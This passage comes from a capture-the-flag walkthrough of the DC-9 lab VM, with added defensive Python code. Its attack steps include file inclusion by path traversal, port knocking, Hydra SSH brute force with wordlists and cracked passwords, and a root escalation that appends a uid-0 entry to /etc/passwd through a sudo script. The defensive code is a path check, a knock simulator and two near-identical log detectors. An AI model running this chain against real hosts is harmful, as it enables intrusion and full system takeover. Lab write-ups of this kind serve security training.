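The traversal works because the page joins the `file` parameter onto a directory without checking where the resulting path ends up. As an added example (not DC-9's code; the allowed-extension list and the temporary web root are assumptions for the demo), the Python below shows the containment check a safe include needs: resolve the candidate path first, then require it to still lie under the base directory, and only then apply an extension policy.

```python
import tempfile
from pathlib import Path
from typing import Dict

# Hypothetical policy for this example: only page templates may be included.
ALLOWED_SUFFIXES = {".php", ".html"}


def safe_include_path(base_dir: str, requested: str) -> str:
    """Map a user-supplied `file` value onto a path inside base_dir.

    '..' segments and symlinks are resolved *before* the containment check,
    so ../../../../etc/passwd is rejected rather than normalised away, and
    an absolute path such as /etc/passwd is rejected as well."""
    if not requested or "\x00" in requested:
        raise ValueError("empty or NUL-containing file name")
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise ValueError(f"path escapes base directory: {requested!r}") from None
    if candidate.suffix not in ALLOWED_SUFFIXES:
        raise ValueError(f"disallowed extension: {candidate.suffix!r}")
    return str(candidate)


def demo() -> Dict[str, str]:
    """Create a throwaway web root with one real page and classify requests
    (constructed inputs, including the traversal string used on this page)."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    (Path(root) / "welcome.php").write_text("<?php echo 'hello'; ?>")
    requests = [
        "welcome.php",               # legitimate include
        "../../../../etc/passwd",    # traversal from the page
        "/etc/passwd",               # absolute path
        "welcome.php\x00.txt",       # NUL-byte truncation attempt
        "css/style.css",             # inside the root but not an includable type
    ]
    results: Dict[str, str] = {}
    for req in requests:
        try:
            safe_include_path(root, req)
            results[req] = "ok"
        except ValueError:
            results[req] = "rejected"
    return results


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{req!r}: {verdict}")
```

Note the order of operations: checking for `../` with a pattern before resolving is the classic mistake, since encodings and symlinks can sidestep it; comparing the resolved path against the resolved base directory is what actually holds.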

Brute-force with the usernames and passwords saved earlier.
Create the username wordlist (user.txt):
echo -e "marym\njulied\nfredf\nbarneyr\ntomc\njerrym\nwilmaf\nbettyr\nchandlerb\njoeyt\nrachelg\nrossg\nmonicag\nphoebeb\nscoots\njanitor\njanitor2" > user.txt
Create the password wordlist (passwords.txt):
cat > passwords.txt << 'EOF'
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
EOF
Brute force
Privilege escalation
The SSH brute force yields three username/password pairs; log in with each of them. PS: if SSH cannot be reached, it is because port 22 is not open and the traffic is filtered; the earlier reconnaissance showed port 22 as closed. In my case, though, SSH login worked straight away after the brute force, possibly because the earlier port scan triggered the rule and opened it.
A knockd service is present.
This service hides services the system is running by adding iptables rules dynamically: a client "knocks" with a custom sequence of port numbers, which makes the system open the required service port so that it becomes reachable from outside.
When no longer needed, a custom closing sequence "closes the door" again, shutting the port so it is no longer exposed. This adds a further layer of protection for the service and the system.
// Configuration file path
The default configuration file is /etc/knockd.conf
http://192.168.0.114/welcome.php?file=../../../../../etc/knockd.conf
File does not exist
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

// With the custom ports known, knock on each of them in order; the SSH service then opens and can be connected to.
// Commands:
nmap 192.168.0.114 -p 7469
nmap 192.168.0.114 -p 8475
nmap 192.168.0.114 -p 9842
// Once these have run, rescan port 22: the SSH service is now open and reachable.
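To see exactly what the configuration above makes the daemon do, the Python below (an added example, not knockd's own code) parses that file and replays knock sequences against a small state machine that approximates knockd's matching rules: ports must arrive in order, a wrong port resets the client, and the whole sequence must finish within seq_timeout seconds of its first knock. The configuration string is a constructed copy of the one read above; the client addresses and timings are made up. It also makes the defensive point plain: once the three port numbers are readable, as they were here through the file inclusion, the knock is no secret at all and the SSH service is only as strong as its passwords.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed copy of the knockd.conf layout read from the target above.
KNOCKD_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""

Config = Dict[str, Dict[str, str]]


def parse_knockd_conf(text: str) -> Config:
    """Parse knockd's INI-style file into {section: {key: value}}.
    Bare flags such as 'UseSyslog' are stored with an empty value."""
    sections: Config = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        header = re.fullmatch(r"\[(.+?)\]", line)
        if header:
            current = header.group(1)
            sections[current] = {}
            continue
        if current is None:
            raise ValueError(f"directive outside any section: {line!r}")
        key, _, value = (part.strip() for part in line.partition("="))
        sections[current][key] = value
    return sections


def knock_sequence(conf: Config, section: str) -> List[int]:
    return [int(p) for p in conf[section]["sequence"].split(",")]


class KnockTracker:
    """Approximation of knockd's matching for one sequence (not its code):
    hit the ports in order; a wrong port resets; the sequence must complete
    within seq_timeout seconds of its first knock."""

    def __init__(self, sequence: List[int], seq_timeout: float) -> None:
        self.sequence = sequence
        self.seq_timeout = seq_timeout
        self._state: Dict[str, Tuple[int, float]] = {}  # ip -> (next index, first knock time)

    def knock(self, ip: str, port: int, t: float) -> bool:
        """Feed one SYN from ip to port at time t; True when the sequence completes."""
        idx, start = self._state.get(ip, (0, t))
        if idx and t - start > self.seq_timeout:
            idx, start = 0, t  # too slow: start over
        if port != self.sequence[idx]:
            self._state.pop(ip, None)  # wrong port: reset
            return False
        if idx == 0:
            start = t
        idx += 1
        if idx == len(self.sequence):
            self._state.pop(ip, None)
            return True
        self._state[ip] = (idx, start)
        return False


def simulate(conf: Config, events: List[Tuple[str, int, float]]) -> List[Tuple[str, str, str]]:
    """Replay (ip, port, time) SYN events against every knock section and
    return the (ip, section, rendered command) actions that would fire."""
    trackers = {
        name: KnockTracker(knock_sequence(conf, name), float(conf[name]["seq_timeout"]))
        for name in conf
        if name != "options"
    }
    actions: List[Tuple[str, str, str]] = []
    for ip, port, t in events:
        for name, tracker in trackers.items():
            if tracker.knock(ip, port, t):
                actions.append((ip, name, conf[name]["command"].replace("%IP%", ip)))
    return actions


if __name__ == "__main__":
    conf = parse_knockd_conf(KNOCKD_CONF)
    # Constructed client: correct order, well inside the 25-second window.
    print(simulate(conf, [("10.0.0.5", 7469, 0), ("10.0.0.5", 8475, 1), ("10.0.0.5", 9842, 2)]))
    # Constructed client: right ports, but the third knock arrives after the timeout.
    print(simulate(conf, [("10.0.0.6", 7469, 0), ("10.0.0.6", 8475, 10), ("10.0.0.6", 9842, 30)]))
```

The three nmap probes above are exactly the first event list: three SYNs to 7469, 8475 and 9842 within 25 seconds, after which the rendered iptables command inserts an ACCEPT rule for port 22 scoped to the knocking address. Because knockd reacts to SYN packets regardless of the port's state, it does not matter that each probe reports the port as closed.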
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p 7469
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:01 EST
Nmap scan report for 192.168.0.114
Host is up (0.00025s latency).
PORT STATE SERVICE
7469/tcp closed unknown
MAC Address: 00:0C:29:19:1A:7B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p 8475
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:01 EST
Nmap scan report for 192.168.0.114
Host is up (0.00021s latency).
PORT STATE SERVICE
8475/tcp closed unknown
MAC Address: 00:0C:29:19:1A:7B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p 9842
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:01 EST
Nmap scan report for 192.168.0.114
Host is up (0.00021s latency).
PORT STATE SERVICE
9842/tcp closed unknown
MAC Address: 00:0C:29:19:1A:7B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
┌──(root㉿kali)-[~]
└─#
Port 22 is now open:
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p22
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:02 EST
Nmap scan report for 192.168.0.114
Host is up (0.00017s latency).
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:19:1A:7B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
┌──(root㉿kali)-[~]
└─#
Next, brute force:
hydra -L user.txt -P passwords.txt ssh://192.168.0.114
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P passwords.txt ssh://192.168.0.114
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-22 00:03:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.0.114:22/
[22][ssh] host: 192.168.0.114 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.0.114 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.0.114 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-22 00:04:18
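From the server side, a run like this leaves a dense burst of failed logins from one address followed by an accepted login for an account that had just been failing. The Python below is an added example (not from the page or from any tool it uses) that performs that detection over a constructed auth.log excerpt: it groups sshd "Failed password" lines by source IP, flags any IP with at least threshold failures inside a time window, and reports which accounts that IP was subsequently accepted for.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sshd auth.log excerpt modelled on the hydra run above; not real logs.
SAMPLE_AUTH_LOG = """\
Nov 22 00:03:22 dc-9 sshd[1201]: Failed password for invalid user marym from 192.168.0.4 port 51002 ssh2
Nov 22 00:03:22 dc-9 sshd[1202]: Failed password for invalid user julied from 192.168.0.4 port 51004 ssh2
Nov 22 00:03:23 dc-9 sshd[1203]: Failed password for fredf from 192.168.0.4 port 51006 ssh2
Nov 22 00:03:23 dc-9 sshd[1204]: Failed password for chandlerb from 192.168.0.4 port 51008 ssh2
Nov 22 00:03:24 dc-9 sshd[1205]: Failed password for chandlerb from 192.168.0.4 port 51010 ssh2
Nov 22 00:03:25 dc-9 sshd[1206]: Accepted password for chandlerb from 192.168.0.4 port 51012 ssh2
Nov 22 00:09:40 dc-9 sshd[1310]: Accepted publickey for janitor from 192.168.0.20 port 40110 ssh2
"""

# Matches the two sshd outcome lines that matter here; other lines are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60) -> List[Dict]:
    """Flag source IPs with >= threshold failed logins inside window_seconds and
    list the accounts that IP was accepted for afterwards (likely compromised)."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    successes: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog lines carry no year
        if m["result"] == "Failed":
            failures[m["ip"]].append(ts)
        else:
            successes[m["ip"]].append((ts, m["user"]))

    findings: List[Dict] = []
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times)):
            # Extend a window starting at failure i as far as the time limit allows.
            j = i
            while j + 1 < len(times) and (times[j + 1] - times[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i + 1 >= threshold:
                accepted = {user for t, user in successes.get(ip, []) if t >= times[i]}
                findings.append({
                    "ip": ip,
                    "failures": j - i + 1,
                    "first_failure": times[i].strftime("%H:%M:%S"),
                    "accepted_after": sorted(accepted),
                })
                break  # one finding per IP is enough for an alert
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f)
```

A success following a burst from the same address is the signal worth paging on: it is the difference between "someone is guessing" and "someone is in". The same grouping also gives the list of accounts to reset, which here would be chandlerb, joeyt and janitor.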
find / -perm -u=s -type f 2>/dev/null  # list SUID binaries
ls -al
User chandlerb:
ssh chandlerb@192.168.0.114
password: UrAG0D!
chandlerb@dc-9:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
chandlerb@dc-9:~$
chandlerb@dc-9:~$ ls -al
total 12
drwx------ 3 chandlerb chandlerb 4096 Nov 22 15:03 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 chandlerb chandlerb 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 chandlerb chandlerb 4096 Nov 22 15:03 .gnupg
chandlerb@dc-9:~$
User joeyt:
ssh joeyt@192.168.0.114
password: Passw0rd
joeyt@dc-9:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
joeyt@dc-9:~$ ls -al
total 12
drwx------ 3 joeyt joeyt 4096 Nov 22 15:03 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 joeyt joeyt 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 joeyt joeyt 4096 Nov 22 15:03 .gnupg
joeyt@dc-9:~$
janitor user:
ssh janitor@192.168.0.114
password: Ilovepeepee
┌──(root㉿kali)-[~]
└─# ssh janitor@192.168.0.114
janitor@192.168.0.114's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
janitor@dc-9:~$ ls -al
total 16
drwx------ 4 janitor janitor 4096 Nov 22 15:04 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Nov 22 15:04 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$
Comparing the three accounts, janitor's home directory contains one extra hidden directory. Inspecting it turns up a password file, so these passwords are added to the earlier wordlist and the brute-force run is repeated.
janitor@dc-9:~$ ls -al
total 16
drwx------ 4 janitor janitor 4096 Nov 22 15:04 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Nov 22 15:04 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$
janitor@dc-9:~$
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
Brute force
hydra -L user.txt -P passwords.txt ssh://192.168.0.114
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P passwords.txt ssh://192.168.0.114
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-22 00:15:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.0.114:22/
[22][ssh] host: 192.168.0.114 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.0.114 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.0.114 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.0.114 login: janitor password: Ilovepeepee
[STATUS] 375.00 tries/min, 375 tries in 00:01h, 17 to do in 00:01h, 15 active
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-22 00:16:50
A new set of login credentials (fredf) was found. Log in with it over SSH, or simply switch to the user with su.
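Both Hydra runs above (the first against the 17-name wordlist, the second after the post-it passwords were added) produce the same footprint on the target: a burst of "Failed password" lines from one source in sshd's auth log, followed by an "Accepted password" for whichever account finally matched. The detector below is an added example for this write-up, not part of the original post or of DC-9; the log lines are constructed to resemble what OpenSSH on Debian writes to /var/log/auth.log, and the window and threshold values are assumptions to tune per environment.

```python
"""Detect SSH password-guessing bursts in auth.log-style lines.

Added example for the Hydra runs in this walkthrough; not part of the
original post.  SAMPLE_LOG is constructed: it imitates OpenSSH's
'Failed password' / 'Accepted password' messages during such a run.
"""
import re
import sys
from collections import defaultdict
from datetime import datetime

# Constructed sample: six failures from 192.168.0.4 in three seconds,
# then a success from the same source, plus one unrelated failure.
SAMPLE_LOG = """\
Nov 22 00:03:22 dc-9 sshd[1201]: Failed password for invalid user marym from 192.168.0.4 port 51200 ssh2
Nov 22 00:03:22 dc-9 sshd[1202]: Failed password for julied from 192.168.0.4 port 51201 ssh2
Nov 22 00:03:23 dc-9 sshd[1203]: Failed password for fredf from 192.168.0.4 port 51202 ssh2
Nov 22 00:03:23 dc-9 sshd[1204]: Failed password for barneyr from 192.168.0.4 port 51203 ssh2
Nov 22 00:03:24 dc-9 sshd[1205]: Failed password for tomc from 192.168.0.4 port 51204 ssh2
Nov 22 00:03:24 dc-9 sshd[1206]: Failed password for jerrym from 192.168.0.4 port 51205 ssh2
Nov 22 00:03:25 dc-9 sshd[1207]: Accepted password for chandlerb from 192.168.0.4 port 51206 ssh2
Nov 22 00:10:00 dc-9 sshd[1300]: Failed password for root from 192.168.0.3 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_line(line, year=2025):
    """Return a dict for an sshd auth line, or None for anything else.
    Syslog timestamps carry no year, so one is supplied (assumed)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, window_s=60, threshold=5):
    """One alert per source IP that reaches `threshold` failures inside any
    `window_s`-second window.  Each alert records the distinct usernames
    tried and any account that accepted a password after the burst began,
    which is the 'guess succeeded' signal a responder cares about most."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits in window_s.
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                burst_start = fails[start]["ts"]
                success = [e["user"] for e in evs
                           if e["result"] == "Accepted" and e["ts"] >= burst_start]
                alerts[ip] = {
                    "failures": len(fails),
                    "users_tried": sorted({e["user"] for e in fails}),
                    "success_after_burst": success,
                }
                break
    return alerts


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, info in detect_bruteforce(text).items():
        print(ip, info)
```

Run it with no argument to see the alert for the constructed sample, or pass a real auth.log path. Many distinct usernames from one source in seconds is the Hydra `-L` pattern, and `success_after_burst` being non-empty is the case to escalate first; fail2ban or sshd's `MaxAuthTries` plus key-only authentication are the usual mitigations for the pattern itself.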
janitor@dc-9:~/.secrets-for-putin$ su fredf
Password:
fredf@dc-9:/home/janitor/.secrets-for-putin$
sudo -l
find / -perm -u=s -type f 2>/dev/null
ls -al
fredf@dc-9:/home/janitor/.secrets-for-putin$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/home/janitor/.secrets-for-putin$
fredf@dc-9:/home/janitor/.secrets-for-putin$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
fredf@dc-9:/home/janitor/.secrets-for-putin$
fredf@dc-9:/home/janitor/.secrets-for-putin$ ls -al
ls: cannot open directory '.': Permission denied
fredf@dc-9:~$
fredf@dc-9:~$ ls -l /opt/devstuff/dist/test/test
-rwxr-xr-x 1 root root 1212968 Dec 29 2019 /opt/devstuff/dist/test/test
fredf@dc-9:~$
fredf@dc-9:/opt/devstuff/dist/test$ ls
base_library.zip libbz2.so.1.0 _lzma.cpython-37m-x86_64-linux-gnu.so
_bz2.cpython-37m-x86_64-linux-gnu.so libcrypto.so.1.1 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
_codecs_cn.cpython-37m-x86_64-linux-gnu.so libexpat.so.1 _opcode.cpython-37m-x86_64-linux-gnu.so
_codecs_hk.cpython-37m-x86_64-linux-gnu.so liblzma.so.5 readline.cpython-37m-x86_64-linux-gnu.so
_codecs_iso2022.cpython-37m-x86_64-linux-gnu.so libpython3.7m.so.1.0 resource.cpython-37m-x86_64-linux-gnu.so
_codecs_jp.cpython-37m-x86_64-linux-gnu.so libreadline.so.7 _ssl.cpython-37m-x86_64-linux-gnu.so
_codecs_kr.cpython-37m-x86_64-linux-gnu.so libssl.so.1.1 termios.cpython-37m-x86_64-linux-gnu.so
_codecs_tw.cpython-37m-x86_64-linux-gnu.so libtinfo.so.6 test
_hashlib.cpython-37m-x86_64-linux-gnu.so libz.so.1
fredf@dc-9:/opt/devstuff/dist/test$
fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$
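The script is a root-run "append file A to file B" with both paths taken straight from the command line, and the sudoers rule hands it to fredf with NOPASSWD. That combination is the whole bug: any file root can read becomes readable, and any file root can write becomes appendable. The version below is an added example written for this write-up, not the DC-9 author's code; it shows what the same utility looks like with the destination confined to one allowlisted directory (the directory name `/opt/devstuff/output` is an assumption), with symlinks refused and the write opened with O_NOFOLLOW.

```python
"""Hardened form of the append-copy helper that test.py implements.

Added example; not the DC-9 author's code.  The original accepts any
source and destination path and runs as root via sudo.  This version
confines the destination to ALLOWED_DEST_DIR (an assumed location),
refuses symlinked paths, and fails closed on any doubt.
"""
import os
import sys
import tempfile

ALLOWED_DEST_DIR = "/opt/devstuff/output"  # assumed drop directory


def safe_append(src, dst, allowed_dir=ALLOWED_DEST_DIR):
    """Append the contents of src to dst; dst must resolve inside allowed_dir.
    Returns the number of characters written."""
    allowed_real = os.path.realpath(allowed_dir)
    dst_real = os.path.realpath(dst)
    # realpath() resolves ../ and symlinks, so allowed_dir/x -> /etc/passwd
    # ends up as /etc/passwd here and fails the containment check.
    if dst_real == allowed_real or os.path.commonpath([allowed_real, dst_real]) != allowed_real:
        raise PermissionError(f"destination {dst!r} is outside {allowed_dir!r}")
    if os.path.islink(dst) or os.path.islink(src):
        raise PermissionError("symlinked paths are refused")
    with open(src, "r") as f:
        data = f.read()
    # O_NOFOLLOW: a symlink swapped in after the check cannot redirect the write.
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(dst_real, flags, 0o640)
    with os.fdopen(fd, "a") as out:
        out.write(data)
    return len(data)


def demo():
    """Self-check in a throwaway directory: one permitted append (twice),
    then a write aimed at /etc/passwd and one through a symlink, both refused."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "note.txt")
        with open(src, "w") as f:
            f.write("hello\n")
        outdir = os.path.join(tmp, "out")
        os.mkdir(outdir)
        dst = os.path.join(outdir, "log.txt")
        results["written"] = safe_append(src, dst, allowed_dir=outdir)
        safe_append(src, dst, allowed_dir=outdir)
        with open(dst) as f:
            results["content"] = f.read()
        try:
            safe_append(src, "/etc/passwd", allowed_dir=outdir)
            results["passwd_refused"] = False
        except PermissionError:
            results["passwd_refused"] = True
        link = os.path.join(outdir, "sneaky")
        os.symlink(src, link)  # inside outdir, but points outside it
        try:
            safe_append(src, link, allowed_dir=outdir)
            results["symlink_refused"] = False
        except PermissionError:
            results["symlink_refused"] = True
    return results


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: safe_test.py read append")
        sys.exit(1)
    try:
        print(safe_append(sys.argv[1], sys.argv[2]), "characters appended")
    except (OSError, PermissionError) as exc:
        print("refused:", exc)
        sys.exit(2)
```

Even the hardened script still reads any file root can read, so the real fix for this box is the sudoers entry itself: a helper like this should run as a dedicated low-privilege account, or not be in sudoers at all. Path containment only narrows the write primitive; it does not justify granting root.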
Next, construct a line in the format of /etc/passwd and append it, which adds a new user entry and escalates privileges; model the line on the existing entries in /etc/passwd.
Save the constructed line to a file, then run test with that file as the source and /etc/passwd as the destination.
fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt 123 admin
$1$123$Ok9FhQy4YioYZeBPwQgm3/
fredf@dc-9:/opt/devstuff$
// root's entry in /etc/passwd
root:x:0:0:root:/root:/bin/bash
// modelled on root's entry, construct a user entry to append to /etc/passwd, adding an admin user
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
fredf@dc-9:/tmp$ vi passwd
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$ ls
passwd
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-apache2.service-TCBHNX
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-systemd-timesyncd.service-rXCWSL
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$ cat passwd
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd
fredf@dc-9:/tmp$
Appended successfully
fredf@dc-9:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
